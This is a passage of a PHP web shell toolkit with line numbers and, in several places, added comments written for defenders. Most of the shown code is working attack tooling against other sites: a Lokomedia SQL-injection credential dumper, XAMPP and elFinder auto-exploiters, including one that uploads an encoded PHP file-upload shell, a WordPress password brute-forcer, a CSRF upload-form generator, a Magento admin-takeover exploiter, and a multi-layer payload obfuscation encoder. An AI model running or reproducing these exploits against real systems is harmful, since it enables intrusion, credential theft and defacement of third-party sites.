1203echo $x01 = ($_POST['pilihan']=="Wordpress") ? get_plugins($site):"";
1204echo $x02 = ($_POST['pilihan']=="Joomla") ? get_components($site):"";
1205echo $x03 = ($_POST['pilihan']=="Nuke's") ? get_numod($site):"";
1206echo $x04 = ($_POST['pilihan']=="Xoops") ? get_xoomod($site):"";
1207}
1208exit;
1209}
1210elseif($_GET['go'] == 'roottutor') {
1211echo "<script src='https://pastebin.com/embed_js/i1mV6Zjf'></script><br><br><br><br><br><br><br><br>";
1212}
1213elseif($_GET['go'] == '64base') {
1214
1215@ini_set('output_buffering',0);
1216@ini_set('display_errors', 0);
1217$text = $_POST['code'];
1218?>
1219<form method="post"><br><center>
1220<textarea class='form-control con7' cols=80 rows=10 name="code"></textarea><br><br>
1221<select class='form-control con7' size="1" name="ope">
1222<center><option value="urlencode">url</option>
1223<option value="base64">Base64</option>
1224<option value="ur">convert_uu</option>
1225<option value="json">json</option>
1226<option value="gzinflates">gzinflate - base64</option>
1227<option value="str2">str_rot13 - base64</option>
1228<option value="gzinflate">str_rot13 - gzinflate - base64</option>
1229<option value="gzinflater">gzinflate - str_rot13 - base64</option>
1230<option value="gzinflatex">gzinflate - str_rot13 - gzinflate - base64</option>
1231<option value="gzinflatew">str_rot13-convert_uu-url-gzinflate-str_rot13-base64-convert_uu-gzinflate-url-str_rot13-gzinflate-base64</option>
1232
1233<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
1234<option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option></center>
1235</select> <br><br><input class='kntd' type='submit' name='submit' value='Encode'>
1236<input class='kntd' type='submit' name='submits' value='Decode'>
1237</form>
1238<br>
1239<?php
1240$submit = $_POST['submit'];
1241if (isset($submit)){
1242$op = $_POST["ope"];
1243switch ($op) {case 'base64': $codi=base64_encode($text);
1244break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
1245break;case 'json' : $codi=json_encode(utf8_encode($text));
1246break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
1247break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
1248break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
1249break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
1250break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
1251break;case 'str2' : $codi=base64_encode(str_rot13($text));
1252break;case 'urlencode' : $codi=rawurlencode($text);
1253break;case 'ur' : $codi=convert_uuencode($text);
1254break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
1255break;default:break;}}
1256
1257$submit = $_POST['submits'];
1258if (isset($submit)){
1259$op = $_POST["ope"];
1260switch ($op) {case 'base64': $codi=base64_decode($text);
1261break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
1262break;case 'json' : $codi=utf8_dencode(json_dencode($text));
1263break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
1264break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
1265break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
1266break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
1267break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
1268break;case 'str2' : $codi=str_rot13(base64_decode($text));
1269break;case 'urlencode' : $codi=rawurldecode($text);
1270break;case 'ur' : $codi=convert_uudecode($text);
1271break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
1272break;default:break;}}
1273$html = htmlentities(stripslashes($codi));
1274echo "<from><textarea cols=80 rows=10 class='form-control con7' >".$html."</textarea><BR/><BR/></center><br></from>";
1275
1276}
1277
1278
1279
1280
1281
1282
1283 elseif($_GET['go'] == 'lokmed')
1284 {
1285?>
1286<center class='mybox'><h1>CMS Lokomedia Auto Exploiter</h1><hr color='white'><br><br>
1287<form method='post'>
1288<textarea name='sites' style='border-color=white;' value='contoh:http://127.0.0.1/hal-tentang-kami.html' cols='50' rows='12'></textarea><br><br>
1289<input type='submit' name='go' value='SIKAT!' style='border-color=white;' class='kotak'>
1290</FORM></center>
1291<?php
1292error_reporting(0);
1293set_time_limit(0);
1294$ya=$_POST['go'];
1295$co=$_POST['sites'];
1296
1297if($ya){
1298$e=explode("rn",$co);
1299foreach($e as $bda){
1300$fp = fopen("cookie.txt", "w+");
1301$Cookie = realpath('cookie.txt');
1302$web = $bda."/statis--1'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html";
1303$curl=curl_init();
1304curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
1305curl_setopt($curl,CURLOPT_URL,"$web");
1306curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
1307curl_setopt($curl,CURLOPT_SSL_VERIFYPEER, false);
1308curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
1309curl_setopt($curl,CURLOPT_COOKIEFILE, "$Cookie");
1310curl_setopt($curl,CURLOPT_TIMEOUT,5);
1311$gweb = curl_exec($curl);
1312$web2 = $bda."/statis--1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html";
1313$curl2=curl_init();
1314curl_setopt($curl2,CURLOPT_RETURNTRANSFER,1);
1315curl_setopt($curl2,CURLOPT_URL,"$web2");
1316curl_setopt($curl2,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
1317curl_setopt($curl2,CURLOPT_SSL_VERIFYPEER, false);
1318curl_setopt($curl2,CURLOPT_FOLLOWLOCATION,1);
1319curl_setopt($curl2,CURLOPT_COOKIEFILE, "$C2ookie");
1320curl_setopt($curl2,CURLOPT_TIMEOUT,5);
1321$gweb2 = curl_exec($curl2);
1322echo '<center><font face="courier" color="#00BFFF" >'.$bda.'</font><br><textarea rows="10" cols="40">'.htmlentities($gweb2).'</textarea>','<textarea rows="10" cols="40">'.htmlentities($gweb).'</textarea>';
1323$cek_admin = @file_get_contents("$bda/adminweb");
1324if(preg_match("/Copyright/", $cek_admin)) {
1325 echo "<BR><font color=green>Berandal</font> => <font color=white><a href='$bda/adminweb' target='_blank'>$bda/adminweb</a></font><br>";
1326 } else {
1327 echo "<br><br>[-] <font color=red> Gak Ada /adminweb, Jancok! -_-</font>[-]<br><br><hr color='white'>";
1328}}}}
1329
1330
1331elseif($_GET['go'] == 'lwa') {
1332?>
1333<div class='mybox'><h1><center>xampp lwa Auto Exploiter</center></h1><hr color='white'><br><br>
1334 <center><form method='POST' action=''>
1335 Target :<br>
1336 <textarea name='target' placeholder='target.com or target.com/[path]' required></textarea><br><br>
1337 kata kata terakhir :<br>
1338 <input type='text' name='pawn' placeholder='hacked by Indonesian h4x0r'/>
1339 <br><br>
1340 <input type='submit' value='Crott..!!!' />
1341 </form>
1342 <?php
1343 if($_POST){
1344 $target = $_POST['target'];
1345 $msg = htmlspecialchars(str_replace(" ","_",$_POST['pawn']));
1346 $msg1 = str_replace("<","_",$msg);
1347 $msg2 = str_replace(">","_",$msg1);
1348 $msg3 = str_replace(">","_",$msg2);
1349 $pwn = str_replace("<","_",$msg3);
1350
1351 if($pwn == ""){
1352 $pwn = "hacked_by_N45HT";
1353 }
1354
1355 $targets = explode("\r\n",$target);
1356 foreach($targets as $site){
1357 if(!preg_match("/^http:\/\//",$site) AND !preg_match("/^https:\/\//",$site)){
1358 $sites = "http://$site";
1359 }else{
1360 $sites = $site;
1361 }
1362
1363 $chx = curl_init("$sites/xampp/lang.tmp");
1364 curl_setopt($chx, CURLOPT_FOLLOWLOCATION, 1);
1365 curl_setopt($chx, CURLOPT_RETURNTRANSFER, 1);
1366 curl_exec($chx);
1367 $httpcodex = curl_getinfo($chx, CURLINFO_HTTP_CODE);
1368 curl_close($chx);
1369
1370 $chs = curl_init("$sites/security/lang.tmp");
1371 curl_setopt($chs, CURLOPT_FOLLOWLOCATION, 1);
1372 curl_setopt($chs, CURLOPT_RETURNTRANSFER, 1);
1373 curl_exec($chs);
1374 $httpcodes = curl_getinfo($chs, CURLINFO_HTTP_CODE);
1375 curl_close($chs);
1376
1377 if($httpcodex == 200){
1378 $ck = curl_init("$sites/xampp/lang.php?$pwn");
1379 curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
1380 curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
1381 $cka = curl_exec($ck);
1382 if($cka){
1383 $ch = curl_init("$sites/xampp/lang.tmp");
1384 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1385 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1386 $cek = curl_exec($ch);
1387 if(preg_match("/$pwn/",$cek)){
1388 echo "[<a href='$sites/xampp/lang.tmp' target=_blank'>$sites/xampp/lang.tmp</a> => OK<br>";
1389 }else{
1390 echo "$sites => FAILED<br>";
1391 }
1392 curl_close($ch);
1393 }
1394 }else if($httpcodes == 200){
1395 $ck = curl_init("$sites/security/lang.php?$pwn");
1396 curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
1397 curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
1398 $cka = curl_exec($ck);
1399 if($cka){
1400 $ch = curl_init("$sites/security/lang.tmp");
1401 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1402 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1403 $cek = curl_exec($ch);
1404 if(preg_match("/$pwn/",$cek)){
1405 echo "[<a href='$sites/security/lang.tmp' target=_blank'>$sites/security/lang.tmp</a> => OK<br>";
1406 }else{
1407 echo "$sites => FAILED<br>";
1408 }
1409 curl_close($ch);
1410 }
1411 }else{
1412 echo "$sites => Not Vuln<br>";
1413 }
1414 }
1415 }
1416echo "</div>";
1417}
1418elseif($_GET['go'] == 'elfinder') {
1419?>
1420<div class='mybox'><h1><center>elfinder Auto Exploiter</center></h1><hr color='white'><br><br>
1421 <center><form method="post">
1422Target: <br>
1423<textarea name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize: none;"></textarea><br>
1424<input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="hajar">
1425</form>
1426</html>
1427<?php
1428# IndoXploit
// POST $isi to $url with cURL and return the response body (or false on failure).
//
// Reading notes for analysts:
//   - CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST are both set to 0, so the
//     server certificate is never validated.
//   - Redirects are followed, so the final responder may differ from $url.
//   - The fixed User-Agent string and the 'coker_log' cookie file are stable
//     artefacts of this script. 'coker_log' is a relative path, so the file is created
//     in the working directory of the host running it.
//   - The cURL handle is never closed inside this function.
1429function ngirim($url, $isi) {
1430$ch = curl_init ("$url");
1431 curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
1432 curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
1433 curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1434 curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
1435 curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
1436 curl_setopt ($ch, CURLOPT_POST, 1);
1437 curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
// The same file is used as cookie jar (written) and cookie file (read).
1438 curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
1439 curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
1440$data3 = curl_exec ($ch);
1441return $data3;
1442}
1443$target = explode("\r\n", $_POST['target']);
1444if($_POST['x']) {
1445 foreach($target as $korban) {
1446 $nama_doang = "k.php";
1447 $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
1448 $decode_isi = base64_decode($isi_nama_doang);
1449 $encode = base64_encode($nama_doang);
1450 $fp = fopen($nama_doang,"w");
1451 fputs($fp, $decode_isi);
1452 echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
1453 echo "# Upload[1] ......<br>";
1454 $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
1455 $b = file_get_contents("$url_mkfile");
1456 $post1 = array(
1457 "cmd" => "put",
1458 "target" => "l1_$encode",
1459 "content" => "$decode_isi",
1460 );
1461 $post2 = array(
1462 "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
1463 "upload[]" => "@$nama_doang",);
1464 $output_mkfile = ngirim("$korban", $post1);
1465 if(preg_match("/$nama_doang/", $output_mkfile)) {
1466 echo "# Upload Success 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
1467 } else {
1468 echo "# Upload Failed 1 <br># Uploading 2..<br>";
1469 $upload_ah = ngirim("$korban?cmd=upload", $post2);
1470 if(preg_match("/$nama_doang/", $upload_ah)) {
1471 echo "# Upload Success 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
1472 } else {
1473 echo "# Upload Failed 2<br><br>";
1474 }
1475 }
1476 }
1477}
1478echo "</div>";
1479}
1480elseif($_GET['go'] == 'hashid') {
1481if (isset($_POST['gethash'])) {
1482 $hash = $_POST['hash'];
1483 if (strlen($hash) == 32) {
1484 $hashresult = "MD5 Hash";
1485 } elseif (strlen($hash) == 40) {
1486 $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
1487 } elseif (strlen($hash) == 13) {
1488 $hashresult = "DES(Unix) Hash";
1489 } elseif (strlen($hash) == 16) {
1490 $hashresult = "MySQL Hash / /DES(Oracle Hash)";
1491 } elseif (strlen($hash) == 41) {
1492 $GetHashChar = substr($hash, 40);
1493 if ($GetHashChar == "*") {
1494 $hashresult = "MySQL5 Hash";
1495 }
1496 } elseif (strlen($hash) == 64) {
1497 $hashresult = "SHA-256 Hash";
1498 } elseif (strlen($hash) == 96) {
1499 $hashresult = "SHA-384 Hash";
1500 } elseif (strlen($hash) == 128) {
1501 $hashresult = "SHA-512 Hash";
1502 } elseif (strlen($hash) == 34) {
1503 if (strstr($hash, '$1$')) {
1504 $hashresult = "MD5(Unix) Hash";
1505 }
1506 } elseif (strlen($hash) == 37) {
1507 if (strstr($hash, '$apr1$')) {
1508 $hashresult = "MD5(APR) Hash";
1509 }
1510 } elseif (strlen($hash) == 34) {
1511 if (strstr($hash, '$H$')) {
1512 $hashresult = "MD5(phpBB3) Hash";
1513 }
1514 } elseif (strlen($hash) == 34) {
1515 if (strstr($hash, '$P$')) {
1516 $hashresult = "MD5(Wordpress) Hash";
1517 }
1518 } elseif (strlen($hash) == 39) {
1519 if (strstr($hash, '$5$')) {
1520 $hashresult = "SHA-256(Unix) Hash";
1521 }
1522 } elseif (strlen($hash) == 39) {
1523 if (strstr($hash, '$6$')) {
1524 $hashresult = "SHA-512(Unix) Hash";
1525 }
1526 } elseif (strlen($hash) == 24) {
1527 if (strstr($hash, '==')) {
1528 $hashresult = "MD5(Base-64) Hash";
1529 }
1530 } else {
1531 $hashresult = "Hash type not found";
1532 }
1533 } else {
1534 $hashresult = "Not Hash Entered";
1535 }
1536?>
1537 <div class='mybox' style="text-align:left">
1538 <form action="" method="POST">
1539 <tr>
1540 <table >
1541 <center><h1>hash identifier</h1><hr color='white'></tr>
1542 <tr class="optionstr"><B><td>String</td></b><td>:</td>
1543 <td><input style='border:0;border-bottom:1px solid #292929; width:500px;' type="text" name="hash" size='60'/></td>
1544 <td><input type="submit" class="kotak" name="gethash" value="Identify Hash" /></td></tr>
1545 <tr class="optionstr"><b><td>Hasil</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
1546 </table></tr></form><br>
1547 </div>
1548<?php
1549}
1550
1551elseif($_GET['go'] == 'csrf') {
1552?> <html>
1553<title>CSRF EXPLOITER ONLINE</title>
1554<center><div class="mybox"><h1>csrf online</h1><hr color='white'><br><br>
1555<font color=Lavenda>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
1556<center>
1557<form method="post">
1558URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
1559POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat Diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
1560<input type="submit" name="d" value="Lock!">
1561</form>
1562<?php
// Second stage of the "csrf" page: turns the posted URL and field name into a
// multipart file-upload form that the operator's browser submits directly to
// that third-party URL in a new tab (target='_blank'). This server never sends
// the upload itself; it only generates the HTML.
//
// Review notes for defenders:
//  - $url and $pf are copied from $_POST into the markup without any HTML
//    escaping, so the page reflects whatever is posted to it.
//  - Upload endpoints are protected against forms like this one by requiring
//    an authenticated session plus an anti-CSRF token, validating the file
//    type server-side, and storing uploads where they cannot be executed.
1563//not important
// "@" only hides the undefined-index notice before the form is submitted.
1564 @$url = $_POST['url'];
1565 @$pf = $_POST['pf'];
1566 @$d = $_POST['d'];
// $d is the submit button's value; any truthy value triggers the output.
1567if($d) {
1568 //baccod
1569
1570 echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><br><input type='submit' name='g' value='Upload Cok!'></form";
1571}
1572?>
1573</form>
1574<?php
1575 ;
1576}
1577elseif ($_GET['go'] == 'zonesong') {
1578
1579 echo '<center><img src="http:///tenor.gif" style: width="250px"><audio autoplay="" src="http:///walker.mp3"></audio><br><br><br><br><br></center>';
1580}
1581elseif($_GET['go'] == 'wpbrute') {
1582 set_time_limit(0);
1583error_reporting(0);
/*
 * Password-guessing client for a WordPress login form.
 *
 * Takes a host, a username and a newline-separated candidate list from
 * $_POST, sends login POSTs through cURL and prints a verdict based only on
 * the HTTP status code of the reply.
 *
 * Review notes for defenders:
 *  - Finding this class on a web server means the server is being used to
 *    attack other sites; treat the file as a compromise artifact.
 *  - On the receiving site the activity appears as repeated POSTs to
 *    /wp-login.php carrying log=, pwd= and wp-submit=Login from one client
 *    with one fixed User-Agent. Login rate limiting or lockout and a second
 *    authentication factor are the usual controls against it.
 *  - host, user and each candidate are echoed back into the page by cool()
 *    without HTML escaping.
 *  - $this->useragent is not declared here; the visible code that
 *    instantiates the class assigns it from outside.
 */
1584class berandal{
// Login URL, taken from POST and completed by Xregex().
1585 private $host;
// Username submitted as the "log" field.
1586 private $user;
// Raw newline-separated candidate list, as posted.
1587 private $open;
// The single candidate currently being tried (assigned by brute()).
1588 private $list;
// Prints the input form (host, user, wordlist). Output only, no parameters.
1589public function banner() {
1590 echo "<div class='mybox' style='text-align:left'>
1591 <center><h1>WordPress Brute Force</h1><hr color='white'>
1592 <form action='' method='POST'>
1593 Host<input type='text' name='host' width:500px;' value='http://127.0.0.1/' size='40'><br><br>
1594 User<input type='text' name='user' width:500px;' value='admin' size='25'><br><br>
1595 Wordlist:
1596 <textarea class='mybox' rows='10' name='list'></textarea><br>
1597 <input type='Submit' class='kotak' style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' value='Start'>
1598 </form></div>
1599 ";
1600
1601}
1602
// Copies the three form fields from $_POST into the object, with no isset()
// check and no validation.
1603 public function extract_post() {
1604 $this->host = $_POST["host"];
1605 $this->user = $_POST["user"];
1606 $this->open = $_POST["list"];
1607 }
1608
// Leaves the host unchanged (and returns true) when it already contains
// "/wp-login.php"; otherwise appends that path and returns nothing.
1609 public function Xregex() {
1610 if(preg_match("@/wp-login.php@", $this->host)) {
1611 return true;
1612 } else {
1613 $this->host = $_POST["host"]."/wp-login.php";
1614 }
1615 }
1616
// Splits the posted list on "\n", drops empty entries, then stores each
// entry in $this->list and hands it to Xcurl().
1617 public function brute() {
1618 $list = array_filter(explode("\n", $this->open));
1619 foreach($list as $this->list) {
1620 for($i=0; $i < count($this->list); $i++) {
1621 $this->Xcurl();
1622 }
1623 }
1624 }
1625
// Prints the host, user and current candidate for the attempt just made.
1626 private function cool() {
1627 echo "[+] Host:"."<font color='black'>{$this->host}</font>";
1628 echo " <br/>[+] User:"."<font color='black'>{$this->user}</font>";
1629 echo " <br/>[+] Pass:"."<font color='black'>{$this->list}</font>";
1630 }
1631
// Sends one login POST to $this->host (10 s connect timeout) and reports
// "success" when the reply's status code is 302, "failed" for anything else.
// The response body is fetched into $exec but never inspected.
1632 private function Xcurl() {
1633 $curl = curl_init();
1634 curl_setopt($curl, CURLOPT_URL, $this->host);
1635 curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
1636 curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
1637 curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
1638 curl_setopt($curl, CURLOPT_POST, true);
1639 curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->list&wp-submit=Login&redirect_to=$this->host/wp-admin/");
1640 $exec = curl_exec($curl);
1641 $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
1642 $this->cool();
1643 if($http == 302) {
1644 echo "<font color='#00FF00'> <br/>[+] Sukses! [+] Tinggal Login Aja</font><br>";
1645
1646 } else {
1647 echo "<font color='white'><br/>[+] Ggal Jancok! -_-</font><br>";
1648 }
1649 curl_close($curl);
1650 }
1651}
1652
// Driver for the "wpbrute" page. It runs on every request to this branch,
// with no check that the form was actually submitted.
// Review note for defenders: the User-Agent below is a fixed string, so it is
// a usable indicator when reviewing access logs of a site that received a
// burst of /wp-login.php POSTs.
1653$wp = new berandal();
1654$wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
1655$wp->banner();
1656$wp->extract_post();
1657$wp->Xregex();
1658$wp->brute();
1659 }
1660elseif($_GET['go'] == 'magento') {
1661 echo '<center><div class="mybox"><h1>Magento Auto Exploiter</h1><hr color="white"><br>
1662<form method="post" action="">
1663<center>
1664<textarea placeholder="http://127.0.0.1/" class="mybox" rows="10" name="target" required></textarea><br><br>
1665<input class="kotak" type=submit name=submit value="Start"><br>
1666</form></div>';
1667error_reporting(0);
1668set_time_limit(0);
1669
/**
 * Strip the price wrapper markup from an HTML fragment.
 *
 * Removes every opening `<span class="price">` tag and every closing
 * `</span>` tag; all other text, including any other markup, is returned
 * untouched.
 *
 * @param string $htmltags HTML fragment to clean.
 * @return string The fragment without those two tags.
 */
function bersihkan($htmltags) {
    // The two patterns are applied in order, opening tag first.
    $wrapperTags = array('<span class="price">', '</span>');

    return str_replace($wrapperTags, '', $htmltags);
}
1676
1677///postdata
1678$postadm = "filter=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%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
1679$postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=owlsquad&login%5Bpassword%5D=owlsquad";
1680$postdwn = "username=owlsquad&password=owlsquad";
1681$pageadm = "/admin/Cms_Wysiwyg/directive/index/";
1682$pagelog = "/admin/";
1683$pagedwn = "/downloader/";
1684
/*
 * Send one form-encoded POST to $url.$page and return the raw reply.
 *
 * $url  - base URL of the remote site (one line of the posted target list).
 * $data - request body, already URL-encoded by the caller.
 * $page - path appended to $url.
 *
 * Returns whatever curl_exec() returns. Because CURLOPT_HEADER is on, the
 * string includes the response headers, which the callers match against with
 * regular expressions.
 *
 * Review notes for defenders:
 *  - TLS peer verification is switched off and redirects are followed.
 *  - Cookies are written to "cookie.txt" in the current working directory;
 *    that file is a disk artifact to look for when this script has run.
 *  - The User-Agent is a fixed Firefox/2.0.0.6 string, which stands out in
 *    the access logs of a site that received these requests.
 */
1685function berandal_CURL($url,$data,$page) {
1686$ch = curl_init();
1687curl_setopt ($ch, CURLOPT_URL, $url.$page);
1688curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
1689curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
1690curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
1691curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
1692curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
1693curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
1694curl_setopt ($ch, CURLOPT_POST, 1);
1695$headers = array();
1696$headers[] = 'Content-Type: application/x-www-form-urlencoded';
1697
1698curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
// Keep the response headers in the returned string.
1699curl_setopt ($ch, CURLOPT_HEADER, 1);
1700$result = curl_exec ($ch);
1701curl_close($ch);
1702return $result;
1703}
/*
 * Main loop of the "magento" page.
 *
 * For every line of the posted target list it sends three POSTs through
 * berandal_CURL(), each one only if the previous step looked successful:
 *   1. $postadm to $pageadm (/admin/Cms_Wysiwyg/directive/index/),
 *   2. $postlog to $pagelog (/admin/), a login with fixed credentials,
 *   3. $postdwn to $pagedwn (/downloader/), a login with the same credentials.
 * Each verdict comes from a plain text match on the raw reply ("200 OK",
 * "302 Moved", "Return to Admin").
 *
 * Review notes for defenders:
 *  - On a store that received this traffic, the observable sequence is a POST
 *    to /admin/Cms_Wysiwyg/directive/index/ carrying forwarded=1, followed by
 *    an admin login and a /downloader/ login with username "owlsquad". An
 *    admin account with that name, or these requests in the access log, is an
 *    indicator of compromise.
 *  - Keeping the platform patched and restricting /admin and /downloader by
 *    network or extra authentication are the usual mitigations.
 *  - $site and the values scraped from the remote reply are concatenated into
 *    the result markup without HTML escaping.
 */
// $banner is not assigned anywhere in the visible part of this branch.
1704print $banner;
1705
1706if(isset($_POST['target'])){
// Targets are split on CRLF only.
1707$j=explode("\r\n",$_POST['target']);
1708foreach($j as $site){
1709
1710 echo'<div class="mybox"><font color="white">';
1711print "Checking, Please wait!
1712<br>";
1713echo'</font>';
// Step 1: the directive request.
1714$sikat = berandal_CURL($site , $postadm, $pageadm);
1715
1716if(preg_match('#200 OK#', $sikat)) {
1717 $expres = "Success";
// Step 2: admin login with the fixed credentials.
1718 $ceklog = berandal_CURL($site , $postlog, $pagelog);
1719
1720if(preg_match('#302 Moved#', $ceklog)) {
// The loop stops after its first pass, so $val is the list of full
// <span>...</span> matches; the first two become the "Lifetime Sales"
// and "Average Order" figures printed below.
1721 preg_match_all('#<span>(.*?)</span>#si', $ceklog, $match);
1722 foreach($match as $val)
1723 {
1724 $ltm = $val[0];
1725 $avo = $val[1];
1726 break;
1727 }
1728 $admlog = "Sukses!";
1729 $user = "owlsquad";
1730 $pass = "owlsquad";
// Step 3: downloader login.
1731 $cekdwn = berandal_CURL($site , $postdwn, $pagedwn);
1732 if(preg_match('#Return to Admin#', $cekdwn)) {
1733 $dwnlog = "Login Sukses!";
1734}else {
1735 $dwnlog = "Login Gagal anjg!";
1736}
1737}else {
// Admin login not accepted: $ltm, $avo and $dwnlog are not assigned on
// this path.
1738 $admlog = "Gagal!";
1739 $user = "NULL";
1740 $pass = "NULL";
1741}
1742}else {
// Step 1 did not return "200 OK": every field is reported as failed.
1743 $admlog = "Gagal!";
1744 $expres = "Gagal!";
1745 $user = "NULL";
1746 $pass = "NULL";
1747 $dwnlog = "Login Gagal Anjg!";
1748 $ltm = "NULL";
1749 $avo = "NULL";
1750}
1751
1752///echo result
1753$logger = '
1754<br>
1755 <font color="white">
1756 <h4>[ '.$site.' ]</h4></font><br>
1757 Exploiting : <font color="lime">'.$expres.'</font><br>
1758 Login Admin : <font color="lime">'.$admlog.'</font><br>
1759 Lifetime Sales: <font color="gold">'.bersihkan($ltm).'</font><br>
1760 Average Order : <font color="gold">'.bersihkan($avo).'</font><br>
1761 Downloader : <font color="white">'.$dwnlog.'</font><br>
1762 Username :<font color="#29c8ef"><b> '.$user.'</font></b><br>
1763 Password :<font color="#29c8ef"><b> '.$pass.'</font></b><br>
1764 </div>';
1765 echo $logger;
1766///removed
1767}
1768}
1769}
1770
1771
1772
1773
1774echo "<center>
1775</font>Copyright © ".date("Y")." - TOOLS ONLINE BY M4L1KL8590X RECODED ALL SHELL</center>";
1776?>